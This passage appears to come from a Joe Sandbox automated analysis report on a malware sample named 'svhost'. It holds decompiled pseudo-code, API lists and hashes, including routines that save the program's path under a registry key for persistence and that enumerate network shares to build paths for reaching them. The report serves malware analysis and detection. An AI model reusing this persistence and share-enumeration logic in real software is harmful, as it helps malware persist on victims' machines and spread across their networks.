				signed int _t41;
				signed char _t47;
				void* _t55;
				signed int _t96;

				_t95 = __esi;
				_t94 = __edi;
				_t64 = __ebx;
				_push(0xffffffff);
				_push(0xec0df0);
				_push( *[fs:0x0]);
				_t40 =  *0xeef074; // 0x221cac15
				_t41 = _t40 ^ _t96;
				_v20 = _t41;
				_push(_t41);
				_t2 =  &_v16; // 0xe55e75
				 *[fs:0x0] = _t2;
				_v60 = __ecx;
				_v54 = 0;
				if((E00E579A0(_v60 + 0x7c) & 0x000000ff) != 0) {
					L12:
					__eflags = 0;
				} else {
					_t47 = E00E579A0(_a4);
					_t89 = _t47 & 0x000000ff;
					if((_t47 & 0x000000ff) != 0) {
						goto L12;
					} else {
						_t7 =  &_a8; // 0xe55e75
						if((E00E579A0( *_t7) & 0x000000ff) != 0) {
							goto L12;
						} else {
							_v64 = E00E63280(_v60 + 0x7c, _a4, 0);
							if(_v64 == 0xffffffff) {
								goto L12;
							} else {
								_t12 =  &_a8; // 0xe55e75
								E00E62190(__ebx,  &_v21, __edi, __esi,  &_v48, E00E51650( *_t12));
								_v52 = 0;
								while(_v52 < E00E57A20( &_v48)) {
									if(_v52 > 0 && _v52 % 0x80 == 0) {
										asm("lfence");
										E00E63530(_t64,  &_v48, _t94, _t95, _v52, "<br>", 4);
										_v52 = _v52 + 1;
									}
									_v52 = _v52 + 1;
								}
								_t55 = E00E57A20(_a4);
								_t89 = _v64;
								E00E634F0(_t64, _v60 + 0x7c, _t94, _t95, __eflags, _v64, _t55,  &_v48);
								_v53 = 1;
								E00E57F50( &_v48);
							}
						}
					}
				}
				_t37 =  &_v16; // 0xe55e75
				 *[fs:0x0] =  *_t37;
				__eflags = _v20 ^ _t96;
				return E00E89A35(_t64, _v20 ^ _t96, _t89, _t94, _t95);
			}

















                                      0x00e62040
                                      0x00e62040
                                      0x00e62040
                                      0x00e62043
                                      0x00e62045
                                      0x00e62050
                                      0x00e62054
                                      0x00e62059
                                      0x00e6205b
                                      0x00e6205e
                                      0x00e6205f
                                      0x00e62062
                                      0x00e62068
                                      0x00e6206d
                                      0x00e62080
                                      0x00e62166
                                      0x00e62166
                                      0x00e62086
                                      0x00e62089
                                      0x00e6208e
                                      0x00e62093
                                      0x00000000
                                      0x00e62099
                                      0x00e62099
                                      0x00e620a6
                                      0x00000000
                                      0x00e620ac
                                      0x00e620bd
                                      0x00e620c4
                                      0x00000000
                                      0x00e620ca
                                      0x00e620ca
                                      0x00e620de
                                      0x00e620e3
                                      0x00e620f5
                                      0x00e62106
                                      0x00e62118
                                      0x00e62129
                                      0x00e62134
                                      0x00e62134
                                      0x00e620f2
                                      0x00e620f2
                                      0x00e62140
                                      0x00e62146
                                      0x00e62150
                                      0x00e62155
                                      0x00e6215c
                                      0x00e62161
                                      0x00e620c4
                                      0x00e620a6
                                      0x00e62093
                                      0x00e62168
                                      0x00e6216b
                                      0x00e62176
                                      0x00e62180

                                      APIs
                                      • std::ios_base::good.LIBCPMTD ref: 00E62076
                                      • std::ios_base::good.LIBCPMTD ref: 00E62089
                                      • std::ios_base::good.LIBCPMTD ref: 00E6209C
                                        • Part of subcall function 00E62190: task.LIBCPMTD ref: 00E62256
                                      • task.LIBCPMTD ref: 00E6215C
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.254558230.0000000000E51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E50000, based on PE: true
                                      • Associated: 00000001.00000002.254538082.0000000000E50000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255570295.0000000000EC4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255570295.0000000000EE4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255873372.0000000000EEF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255886786.0000000000EF0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255901582.0000000000EF2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255915853.0000000000EF4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_e50000_svhost.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: std::ios_base::good$task
                                      • String ID: <br>$u^$u^
                                      • API String ID: 1082396423-3425503538
                                      • Opcode ID: a17f251f72fefa6294009a55d1e5df84ec27caaa13eef4dc4c17419c276dd081
                                      • Instruction ID: 0bcdeefbb7bd93f59452be8dfd73cd983698056d8e1eeee66187e43d3b5399d8
                                      • Opcode Fuzzy Hash: a17f251f72fefa6294009a55d1e5df84ec27caaa13eef4dc4c17419c276dd081
                                      • Instruction Fuzzy Hash: 5B315F71D54148ABCB08DFA8F891BEEB7B5BF94344F00912DFA567B282EB305909CB50
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00E5F110 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 91COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.254558230.0000000000E51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E50000, based on PE: true
                                      • Associated: 00000001.00000002.254538082.0000000000E50000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255570295.0000000000EC4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255570295.0000000000EE4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255873372.0000000000EEF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255886786.0000000000EF0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255901582.0000000000EF2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255915853.0000000000EF4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_e50000_svhost.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: NameName::
                                      • String ID: :
                                      • API String ID: 1333004437-2144431980
                                      • Opcode ID: bbcc402540c8cbd11a47e37db72dd58c8c978e0457d2929bf92a909f02b1ecf8
                                      • Instruction ID: adc8d8454d30553aeb8afd14238d261f2f02bd1a1326856fa3521c65d5d07c12
                                      • Opcode Fuzzy Hash: bbcc402540c8cbd11a47e37db72dd58c8c978e0457d2929bf92a909f02b1ecf8
                                      • Instruction Fuzzy Hash: 5241BBB4D01209DFCB04DF94D991AEEBBF5AF88341F24956AE816BB351DB306A05CF50
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00E55680 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 50registryCOMMON
                                      Download Yara Rule
                                      C-Code - Quality: 100%
                                      			E00E55680(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				signed int _v8;
				char _v9;
				char _v36;
				void* _v40;
				char _v41;
				long _v48;
				int _v52;
				signed int _t16;
				signed char _t20;
				signed int _t25;
				signed int _t43;

				_t42 = __esi;
				_t41 = __edi;
				_t30 = __ebx;
				_t16 =  *0xeef074; // 0x221cac15
				_v8 = _t16 ^ _t43;
				_v41 = 0;
				E00E55720(__ebx,  &_v9, __edi, __esi, __eflags,  &_v36);
				_t20 = E00E579A0( &_v36);
				_t40 = _t20 & 0x000000ff;
				if((_t20 & 0x000000ff) == 0) {
					_v48 = RegCreateKeyW(0x80000001, L"SOFTWARE\\MDSLK",  &_v40);
					if(_v48 == 0) {
						_v52 = 1;
						_t25 = E00E57A20( &_v36);
						RegSetValueExW(_v40, L"Self", 0, 1, E00E57A40(), _t25 << 1);
						_t40 = _v40;
						RegCloseKey(_v40);
					}
				}
				E00E57B40( &_v36);
				return E00E89A35(_t30, _v8 ^ _t43, _t40, _t41, _t42);
			}














                                      0x00e55680
                                      0x00e55680
                                      0x00e55680
                                      0x00e55686
                                      0x00e5568d
                                      0x00e55692
                                      0x00e5569c
                                      0x00e556a4
                                      0x00e556a9
                                      0x00e556ae
                                      0x00e556c4
                                      0x00e556cb
                                      0x00e556cd
                                      0x00e556d7
                                      0x00e556f5
                                      0x00e556fb
                                      0x00e556ff
                                      0x00e556ff
                                      0x00e556cb
                                      0x00e55708
                                      0x00e5571a

                                      APIs
                                        • Part of subcall function 00E55720: GetModuleFileNameW.KERNEL32(00000000,00000000,00000000,00000000,00000104,00000000,221CAC15), ref: 00E55770
                                        • Part of subcall function 00E55720: task.LIBCPMTD ref: 00E557C9
                                        • Part of subcall function 00E55720: task.LIBCPMTD ref: 00E557FA
                                      • std::ios_base::good.LIBCPMTD ref: 00E556A4
                                      • RegCreateKeyW.ADVAPI32(80000001,SOFTWARE\MDSLK,?), ref: 00E556BE
                                      • RegSetValueExW.ADVAPI32(?,Self,00000000,00000001,00000000,00000000), ref: 00E556F5
                                      • RegCloseKey.ADVAPI32(?), ref: 00E556FF
                                      • task.LIBCPMTD ref: 00E55708
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.254558230.0000000000E51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E50000, based on PE: true
                                      • Associated: 00000001.00000002.254538082.0000000000E50000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255570295.0000000000EC4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255570295.0000000000EE4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255873372.0000000000EEF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255886786.0000000000EF0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255901582.0000000000EF2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255915853.0000000000EF4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_e50000_svhost.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: task$CloseCreateFileModuleNameValuestd::ios_base::good
                                      • String ID: SOFTWARE\MDSLK$Self
                                      • API String ID: 3810202371-3971736956
                                      • Opcode ID: 5251efb55a6a165c05adb35cde7a3ec32fb812f949e7dda5c3b3ad3979d8837c
                                      • Instruction ID: a13e0a7ce9488fefd8aa79b634a98862557ff057be6ada6f06e258f42e18b558
                                      • Opcode Fuzzy Hash: 5251efb55a6a165c05adb35cde7a3ec32fb812f949e7dda5c3b3ad3979d8837c
                                      • Instruction Fuzzy Hash: 22118E7191020CDFCB04EFA4DC52FEEB3B5EB58301F405469E94276191EF716A09CB60
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00E6DD10 Relevance: 12.1, APIs: 8, Instructions: 136COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 85%
                                      			E00E6DD10(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, intOrPtr _a4, intOrPtr _a8) {
				char _v16;
				signed int _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v44;
				char _v68;
				void* _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				intOrPtr* _v84;
				intOrPtr _v88;
				char _v112;
				char _v136;
				char _v160;
				char _v184;
				signed int _t53;
				signed int _t54;
				intOrPtr _t67;
				void* _t71;
				void* _t76;
				void* _t80;
				void* _t86;
				void* _t118;
				void* _t119;
				signed int _t120;
				void* _t121;
				void* _t122;

				_t119 = __esi;
				_t118 = __edi;
				_t86 = __ebx;
				_push(0xffffffff);
				_push(0xec1830);
				_push( *[fs:0x0]);
				_t122 = _t121 - 0xa8;
				_t53 =  *0xeef074; // 0x221cac15
				_t54 = _t53 ^ _t120;
				_v20 = _t54;
				_push(_t54);
				 *[fs:0x0] =  &_v16;
				_v88 = __ecx;
				E00E515C0( &_v44, 0xc);
				E00E566A0( &_v44);
				if((E00E579A0(_a8) & 0x000000ff) == 0) {
					_v72 = 0;
					_v76 = 0;
					_v24 = 0;
					_v32 = 0;
					_v28 = 0;
					do {
						_t113 =  &_v32;
						_t67 = E00E57A40();
						__imp__NetShareEnum(_t67, 1,  &_v72, 0xffffffff,  &_v24,  &_v32,  &_v28);
						_v76 = _t67;
						if(_v76 == 0 || _v76 == 0xea) {
							_v84 = _v72;
							_v80 = 1;
							while(1) {
								_t130 = _v80 - _v24;
								if(_v80 > _v24) {
									break;
								}
								E00E57CD0(_t86,  &_v68, _t118, _t119, _t130,  *_v84);
								_t71 = E00E6DF00( &_v68, "$", 0);
								_t131 = _t71 - 0xffffffff;
								if(_t71 == 0xffffffff) {
									_t76 = E00E66510(_t86, _t118, _t131,  &_v184, L"\\\\", _a8);
									_t107 =  &_v160;
									_t80 = E00E68360(_t86, _t107, _t118, _t119, _t131,  &_v112, E00E6E080(_t86,  &_v160, _t118, _t119, _t131,  &_v136, E00E68360(_t86,  &_v160, _t118, _t119, _t131,  &_v160, _t76, "\\"),  &_v68), "\\");
									_t122 = _t122 + 0x30;
									E00E61E50( &_v44, _t80);
									E00E57B40( &_v112);
									E00E57B40( &_v136);
									E00E57B40( &_v160);
									E00E57B40( &_v184);
								}
								_v84 = _v84 + 0xc;
								E00E57B40( &_v68);
								_v80 = _v80 + 1;
							}
							_t113 = _v72;
							NetApiBufferFree(_v72);
						}
						__eflags = _v76 - 0xea;
					} while (_v76 == 0xea);
				}
				E00E57460(_a4, E00E51650( &_v44));
				E00E578B0( &_v44);
				 *[fs:0x0] = _v16;
				__eflags = _v20 ^ _t120;
				return E00E89A35(_t86, _v20 ^ _t120, _t113, _t118, _t119);
			}































                                      0x00e6dd10
                                      0x00e6dd10
                                      0x00e6dd10
                                      0x00e6dd13
                                      0x00e6dd15
                                      0x00e6dd20
                                      0x00e6dd21
                                      0x00e6dd27
                                      0x00e6dd2c
                                      0x00e6dd2e
                                      0x00e6dd31
                                      0x00e6dd35
                                      0x00e6dd3b
                                      0x00e6dd43
                                      0x00e6dd4b
                                      0x00e6dd5d
                                      0x00e6dd63
                                      0x00e6dd6a
                                      0x00e6dd71
                                      0x00e6dd78
                                      0x00e6dd7f
                                      0x00e6dd86
                                      0x00e6dd8a
                                      0x00e6dd9d
                                      0x00e6dda3
                                      0x00e6dda9
                                      0x00e6ddb0
                                      0x00e6ddc2
                                      0x00e6ddc5
                                      0x00e6ddd7
                                      0x00e6ddda
                                      0x00e6dddd
                                      0x00000000
                                      0x00000000
                                      0x00e6ddec
                                      0x00e6ddfb
                                      0x00e6de00
                                      0x00e6de03
                                      0x00e6de27
                                      0x00e6de30
                                      0x00e6de54
                                      0x00e6de59
                                      0x00e6de60
                                      0x00e6de68
                                      0x00e6de73
                                      0x00e6de7e
                                      0x00e6de89
                                      0x00e6de89
                                      0x00e6de94
                                      0x00e6de9a
                                      0x00e6ddd4
                                      0x00e6ddd4
                                      0x00e6dea4
                                      0x00e6dea8
                                      0x00e6dea8
                                      0x00e6deae
                                      0x00e6deae
                                      0x00e6dd86
                                      0x00e6decb
                                      0x00e6ded3
                                      0x00e6dede
                                      0x00e6dee9
                                      0x00e6def3

                                      APIs
                                      • std::ios_base::good.LIBCPMTD ref: 00E6DD53
                                      • NetShareEnum.NETAPI32(00000000,00000001,00000000,000000FF,00000000,00000000,00000000,0000000C,221CAC15), ref: 00E6DDA3
                                      • task.LIBCPMTD ref: 00E6DE68
                                      • task.LIBCPMTD ref: 00E6DE73
                                      • task.LIBCPMTD ref: 00E6DE7E
                                      • task.LIBCPMTD ref: 00E6DE89
                                      • task.LIBCPMTD ref: 00E6DE9A
                                      • NetApiBufferFree.NETAPI32(00000000), ref: 00E6DEA8
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.254558230.0000000000E51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E50000, based on PE: true
                                      • Associated: 00000001.00000002.254538082.0000000000E50000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255570295.0000000000EC4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255570295.0000000000EE4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255873372.0000000000EEF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255886786.0000000000EF0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255901582.0000000000EF2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255915853.0000000000EF4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_e50000_svhost.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: task$BufferEnumFreeSharestd::ios_base::good
                                      • String ID:
                                      • API String ID: 1990917881-0
                                      • Opcode ID: c72796c686b7aec00ad91bdef508dd6f5a3562420c9832380aa21de568e91df9
                                      • Instruction ID: 8c67af6674e3faf6d3e85b05f1748db223fc4fbee44137172374db6edf09377c
                                      • Opcode Fuzzy Hash: c72796c686b7aec00ad91bdef508dd6f5a3562420c9832380aa21de568e91df9
                                      • Instruction Fuzzy Hash: EF519FB1D04208DBCB04EF90EC92FEEB7B9BF54304F505669E406BB281EB706A49CB50
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00EAEE0B Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 264COMMONLIBRARYCODE
                                      Download Yara Rule
                                      C-Code - Quality: 75%
                                      			E00EAEE0B(void* __ebx, void* __ecx, signed int __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, signed int _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				short _v270;
				short _v272;
				char _v528;
				char _v700;
				signed int _v704;
				short _v706;
				signed int* _v708;
				signed int _v712;
				signed int _v716;
				signed int _v720;
				signed int* _v724;
				intOrPtr _v728;
				signed int _v732;
				signed int _v736;
				signed int _v740;
				signed int _v744;
				intOrPtr _v772;
				signed int _v784;
				void* __ebp;
				signed int _t151;
				void* _t158;
				signed int _t161;
				signed int _t162;
				intOrPtr _t163;
				signed int _t166;
				signed int _t168;
				signed int _t169;
				signed int _t172;
				signed int _t173;
				signed int _t176;
				signed int _t177;
				signed int _t179;
				signed int _t199;
				signed int _t201;
				signed int _t203;
				signed int _t208;
				signed int _t211;
				void* _t212;
				signed int _t219;
				intOrPtr* _t220;
				char* _t227;
				signed int _t229;
				intOrPtr _t232;
				intOrPtr* _t233;
				signed int _t235;
				signed int* _t239;
				signed int _t240;
				intOrPtr _t247;
				void* _t248;
				void* _t251;
				signed int _t253;
				signed int _t255;
				signed int _t258;
				signed int* _t259;
				intOrPtr* _t260;
				short _t261;
				signed int _t263;
				signed int _t267;
				void* _t269;
				void* _t271;

				_t245 = __edx;
				_t263 = _t267;
				_t151 =  *0xeef074; // 0x221cac15
				_v8 = _t151 ^ _t263;
				_push(__ebx);
				_t211 = _a8;
				_push(__esi);
				_push(__edi);
				_t247 = _a4;
				_v736 = _t211;
				_v724 = E00EB0EFC(__ecx, __edx) + 0x278;
				_t158 = E00EAE4F6(_t211, __edx, _t247, _a12, _a12,  &_v272, 0x83,  &_v700, 0x55,  &_v712);
				_t269 = _t267 - 0x2e4 + 0x18;
				if(_t158 == 0) {
					L40:
					__eflags = 0;
					goto L41;
				} else {
					_t10 = _t211 + 2; // 0x6
					_t253 = _t10 << 4;
					_t161 =  &_v272;
					_v716 = _t253;
					_t245 =  *(_t253 + _t247);
					_t219 =  *(_t253 + _t247);
					while(1) {
						_v704 = _v704 & 0x00000000;
						_t255 = _v716;
						if( *_t161 !=  *_t219) {
							break;
						}
						if( *_t161 == 0) {
							L7:
							_t162 = _v704;
						} else {
							_t261 =  *((intOrPtr*)(_t161 + 2));
							_v706 = _t261;
							_t255 = _v716;
							if(_t261 !=  *((intOrPtr*)(_t219 + 2))) {
								break;
							} else {
								_t161 = _t161 + 4;
								_t219 = _t219 + 4;
								if(_v706 != 0) {
									continue;
								} else {
									goto L7;
								}
							}
						}
						L9:
						if(_t162 != 0) {
							_t220 =  &_v272;
							_t245 = _t220 + 2;
							do {
								_t163 =  *_t220;
								_t220 = _t220 + 2;
								__eflags = _t163 - _v704;
							} while (_t163 != _v704);
							_v720 = (_t220 - _t245 >> 1) + 1;
							_t166 = E00EB0559(4 + ((_t220 - _t245 >> 1) + 1) * 2);
							_v732 = _t166;
							__eflags = _t166;
							if(_t166 == 0) {
								goto L40;
							} else {
								_v728 =  *((intOrPtr*)(_t255 + _t247));
								_v740 =  *(_t247 + 0xa0 + _t211 * 4);
								_v744 =  *(_t247 + 8);
								_t227 =  &_v272;
								_v708 = _t166 + 4;
								_t168 = E00EA58BC(_t166 + 4, _v720, _t227);
								_t271 = _t269 + 0xc;
								__eflags = _t168;
								if(_t168 != 0) {
									_t169 = _v704;
									_push(_t169);
									_push(_t169);
									_push(_t169);
									_push(_t169);
									_push(_t169);
									E00EA4980();
									asm("int3");
									_push(_t263);
									_push(_t227);
									_v784 = _v784 & 0x00000000;
									_t172 = E00EB16D5(_v772, 0x20001004,  &_v784, 2);
									__eflags = _t172;
									if(_t172 == 0) {
										L50:
										_t173 = 0xfde9;
									} else {
										_t173 = _v12;
										__eflags = _t173;
										if(_t173 == 0) {
											goto L50;
										}
									}
									return _t173;
								} else {
									__eflags = _v272 - 0x43;
									 *((intOrPtr*)(_t255 + _t247)) = _v708;
									if(_v272 != 0x43) {
										L18:
										_t176 = E00EAE213(_t211, _t247,  &_v700);
										_t229 = _v704;
									} else {
										__eflags = _v270;
										if(_v270 != 0) {
											goto L18;
										} else {
											_t229 = _v704;
											_t176 = _t229;
										}
									}
									 *(_t247 + 0xa0 + _t211 * 4) = _t176;
									__eflags = _t211 - 2;
									if(_t211 != 2) {
										__eflags = _t211 - 1;
										if(_t211 != 1) {
											__eflags = _t211 - 5;
											if(_t211 == 5) {
												 *((intOrPtr*)(_t247 + 0x14)) = _v712;
											}
										} else {
											 *((intOrPtr*)(_t247 + 0x10)) = _v712;
										}
									} else {
										_t259 = _v724;
										_t245 = _t229;
										_t239 = _t259;
										 *(_t247 + 8) = _v712;
										_v708 = _t259;
										_v720 = _t259[8];
										_v712 = _t259[9];
										while(1) {
											__eflags =  *(_t247 + 8) -  *_t239;
											if( *(_t247 + 8) ==  *_t239) {
												break;
											}
											_t260 = _v708;
											_t245 = _t245 + 1;
											_t208 =  *_t239;
											 *_t260 = _v720;
											_v712 = _t239[1];
											_t239 = _t260 + 8;
											 *((intOrPtr*)(_t260 + 4)) = _v712;
											_t211 = _v736;
											_t259 = _v724;
											_v720 = _t208;
											_v708 = _t239;
											__eflags = _t245 - 5;
											if(_t245 < 5) {
												continue;
											} else {
											}
											L26:
											__eflags = _t245 - 5;
											if(__eflags == 0) {
												_t199 = E00EB5E4E(_t245, __eflags, _v704, 1, 0xecaf30, 0x7f,  &_v528,  *(_t247 + 8), 1);
												_t271 = _t271 + 0x1c;
												__eflags = _t199;
												if(_t199 == 0) {
													_t240 = _v704;
												} else {
													_t201 = _v704;
													do {
														 *(_t263 + _t201 * 2 - 0x20c) =  *(_t263 + _t201 * 2 - 0x20c) & 0x000001ff;
														_t201 = _t201 + 1;
														__eflags = _t201 - 0x7f;
													} while (_t201 < 0x7f);
													_t203 = E00EA19FD( &_v528,  *0xeef2b8, 0xfe);
													_t271 = _t271 + 0xc;
													__eflags = _t203;
													_t240 = 0 | _t203 == 0x00000000;
												}
												_t259[1] = _t240;
												 *_t259 =  *(_t247 + 8);
											}
											 *(_t247 + 0x18) = _t259[1];
											goto L38;
										}
										__eflags = _t245;
										if(_t245 != 0) {
											 *_t259 =  *(_t259 + _t245 * 8);
											_t259[1] =  *(_t259 + 4 + _t245 * 8);
											 *(_t259 + _t245 * 8) = _v720;
											 *(_t259 + 4 + _t245 * 8) = _v712;
										}
										goto L26;
									}
									L38:
									_t177 = _t211 * 0xc;
									_t106 = _t177 + 0xecafb8; // 0xe8a7d8
									 *0xec4320(_t247);
									_t179 =  *((intOrPtr*)( *_t106))();
									_t232 = _v728;
									__eflags = _t179;
									if(_t179 == 0) {
										__eflags = _t232 - 0xeef388;
										if(_t232 != 0xeef388) {
											_t258 = _t211 + _t211;
											__eflags = _t258;
											asm("lock xadd [eax], ecx");
											if(_t258 != 0) {
												goto L45;
											} else {
												E00EB051F( *((intOrPtr*)(_t247 + 0x28 + _t258 * 8)));
												E00EB051F( *((intOrPtr*)(_t247 + 0x24 + _t258 * 8)));
												E00EB051F( *(_t247 + 0xa0 + _t211 * 4));
												_t235 = _v704;
												 *(_v716 + _t247) = _t235;
												 *(_t247 + 0xa0 + _t211 * 4) = _t235;
											}
										}
										_t233 = _v732;
										 *_t233 = 1;
										 *((intOrPtr*)(_t247 + 0x28 + (_t211 + _t211) * 8)) = _t233;
									} else {
										 *((intOrPtr*)(_v716 + _t247)) = _t232;
										E00EB051F( *(_t247 + 0xa0 + _t211 * 4));
										 *(_t247 + 0xa0 + _t211 * 4) = _v740;
										E00EB051F(_v732);
										 *(_t247 + 8) = _v744;
										goto L40;
									}
									goto L41;
								}
							}
						} else {
							L41:
							_pop(_t248);
							_pop(_t251);
							_pop(_t212);
							return E00E89A35(_t212, _v8 ^ _t263, _t245, _t248, _t251);
						}
						goto L52;
					}
					asm("sbb eax, eax");
					_t162 = _t161 | 0x00000001;
					__eflags = _t162;
					goto L9;
				}
				L52:
			}

































































                                      0x00eaee0b
                                      0x00eaee0e
                                      0x00eaee16
                                      0x00eaee1d
                                      0x00eaee20
                                      0x00eaee21
                                      0x00eaee24
                                      0x00eaee28
                                      0x00eaee29
                                      0x00eaee2c
                                      0x00eaee3c
                                      0x00eaee5f
                                      0x00eaee64
                                      0x00eaee69
                                      0x00eaf141
                                      0x00eaf141
                                      0x00000000
                                      0x00eaee6f
                                      0x00eaee6f
                                      0x00eaee72
                                      0x00eaee75
                                      0x00eaee7b
                                      0x00eaee81
                                      0x00eaee84
                                      0x00eaee86
                                      0x00eaee89
                                      0x00eaee93
                                      0x00eaee99
                                      0x00000000
                                      0x00000000
                                      0x00eaee9f
                                      0x00eaeec8
                                      0x00eaeec8
                                      0x00eaeea1
                                      0x00eaeea1
                                      0x00eaeea9
                                      0x00eaeeb0
                                      0x00eaeeb6
                                      0x00000000
                                      0x00eaeeb8
                                      0x00eaeeb8
                                      0x00eaeebb
                                      0x00eaeec6
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00eaeec6
                                      0x00eaeeb6
                                      0x00eaeed5
                                      0x00eaeed7
                                      0x00eaeee0
                                      0x00eaeee6
                                      0x00eaeee9
                                      0x00eaeee9
                                      0x00eaeeec
                                      0x00eaeeef
                                      0x00eaeeef
                                      0x00eaeeff
                                      0x00eaef0d
                                      0x00eaef12
                                      0x00eaef19
                                      0x00eaef1b
                                      0x00000000
                                      0x00eaef21
                                      0x00eaef27
                                      0x00eaef34
                                      0x00eaef3d
                                      0x00eaef43
                                      0x00eaef50
                                      0x00eaef57
                                      0x00eaef5c
                                      0x00eaef5f
                                      0x00eaef61
                                      0x00eaf1c1
                                      0x00eaf1c7
                                      0x00eaf1c8
                                      0x00eaf1c9
                                      0x00eaf1ca
                                      0x00eaf1cb
                                      0x00eaf1cc
                                      0x00eaf1d1
                                      0x00eaf1d4
                                      0x00eaf1d7
                                      0x00eaf1d8
                                      0x00eaf1ea
                                      0x00eaf1ef
                                      0x00eaf1f1
                                      0x00eaf1fa
                                      0x00eaf1fa
                                      0x00eaf1f3
                                      0x00eaf1f3
                                      0x00eaf1f6
                                      0x00eaf1f8
                                      0x00000000
                                      0x00000000
                                      0x00eaf1f8
                                      0x00eaf200
                                      0x00eaef67
                                      0x00eaef67
                                      0x00eaef75
                                      0x00eaef78
                                      0x00eaef8e
                                      0x00eaef95
                                      0x00eaef9b
                                      0x00eaef7a
                                      0x00eaef7a
                                      0x00eaef82
                                      0x00000000
                                      0x00eaef84
                                      0x00eaef84
                                      0x00eaef8a
                                      0x00eaef8a
                                      0x00eaef82
                                      0x00eaefa1
                                      0x00eaefa8
                                      0x00eaefab
                                      0x00eaf0cb
                                      0x00eaf0ce
                                      0x00eaf0db
                                      0x00eaf0de
                                      0x00eaf0e6
                                      0x00eaf0e6
                                      0x00eaf0d0
                                      0x00eaf0d6
                                      0x00eaf0d6
                                      0x00eaefb1
                                      0x00eaefb1
                                      0x00eaefb7
                                      0x00eaefbf
                                      0x00eaefc1
                                      0x00eaefc4
                                      0x00eaefcd
                                      0x00eaefd6
                                      0x00eaefdc
                                      0x00eaefdf
                                      0x00eaefe1
                                      0x00000000
                                      0x00000000
                                      0x00eaefe3
                                      0x00eaefe9
                                      0x00eaefea
                                      0x00eaeff5
                                      0x00eaeffd
                                      0x00eaf005
                                      0x00eaf008
                                      0x00eaf00b
                                      0x00eaf011
                                      0x00eaf017
                                      0x00eaf01d
                                      0x00eaf023
                                      0x00eaf026
                                      0x00000000
                                      0x00000000
                                      0x00eaf028
                                      0x00eaf04d
                                      0x00eaf04d
                                      0x00eaf050
                                      0x00eaf06d
                                      0x00eaf072
                                      0x00eaf075
                                      0x00eaf077
                                      0x00eaf0b5
                                      0x00eaf079
                                      0x00eaf079
                                      0x00eaf07f
                                      0x00eaf084
                                      0x00eaf08c
                                      0x00eaf08d
                                      0x00eaf08d
                                      0x00eaf0a4
                                      0x00eaf0ab
                                      0x00eaf0ae
                                      0x00eaf0b0
                                      0x00eaf0b0
                                      0x00eaf0bb
                                      0x00eaf0c1
                                      0x00eaf0c1
                                      0x00eaf0c6
                                      0x00000000
                                      0x00eaf0c6
